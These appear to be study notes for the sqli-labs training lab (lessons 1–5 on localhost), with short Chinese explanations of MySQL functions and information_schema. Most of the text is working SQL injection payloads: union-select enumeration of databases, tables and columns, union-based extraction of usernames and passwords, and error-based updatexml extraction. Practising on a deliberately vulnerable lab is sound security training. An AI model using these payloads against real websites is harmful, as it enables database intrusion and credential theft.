xhttp://localhost/sqli-labs-master/Less-1/?id=1
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=1 and 1=1-- -http://localhost/sqli-labs-master/Less-1/?id=1 and 1=2-- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=1'
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=1' order by 3-- -http://localhost/sqli-labs-master/Less-1/?id=1' order by 4-- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(username,password) from security.users -- -
Group_concat()：将属于同一组的多个值合并成一个字符串显示出来。
Information_schema：MySQL 自带的系统库（5.0 及以上版本才有），只读，并不是一个真正存储业务数据的库，不能对它执行 insert、update、delete 等语句。
Schema_name：数据库名称。
Schemata：存储 MySQL 下各个数据库的相关信息。
Table_name：数据表的名称。
Table_schema：该数据表所属的数据库。
Column_name：字段名称。
Columns：存储 MySQL 下每一个数据表中所有字段名（列名）。
如何判断注入点是数值型还是字符型？参数在 SQL 语句中被引号包裹的就是字符型，没有被引号包裹的就是数值型。
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=1
xhttp://localhost/sqli-labs-master/Less-3/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-3/?id=1 and 1=2 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=1')
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=1') order by 3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,database(),3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(username,password) from security.users -- -
xhttp://localhost/sqli-labs-master/Less-2/?id=1数值型:http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2 -- -http://localhost/sqli-labs-master/Less-2/?id=1http://localhost/sqli-labs-master/Less-2/?id=1’http://localhost/sqli-labs-master/Less-2/?id=1 order by 3 -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(username,password) from security.users -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-4/?id=1字符型:http://localhost/sqli-labs-master/Less-4/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-4/?id=1 and 1=2 -- -包裹符:http://localhost/sqli-labs-master/Less-4/?id=1"http://localhost/sqli-labs-master/Less-4/?id=1")http://localhost/sqli-labs-master/Less-4/?id=1") order by 3 -- -http://localhost/sqli-labs-master/Less-4/?id=1") order by 4 -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,database() -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(username,password) from security.users -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-5/?id=1'http://localhost/sqli-labs-master/Less-5/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-5/?id=1 and 1=2 -- -http://localhost/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -报库名http://localhost/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -报表名:(第一个表的)http://localhost/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- -或(获取user表的)http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) -- -报字段名称:http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' limit 0,1),0x7e),1) -- -获取用户数据:http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) -- -
Updatexml(arg1, arg2, arg3)：arg1 为 XML 文档对象的名称；arg2 为 XPath 格式的字符串；arg3 为 string 格式，用来替换查找到的符合条件的数据。
Extractvalue(arg1, arg2)：arg1 为 string 格式的 XML 文档对象名称；arg2 为 XPath 格式的字符串。
0x7e：即字符 "~"（可以直接用 "~" 代替），它使 XPath 字符串解析出错，从而在报错信息中回显查询内容。
Floor(rand(0)*2)：rand(0) 以固定种子 0 生成一组固定不变的随机数序列；rand(0)*2 是将生成的随机数乘以 2。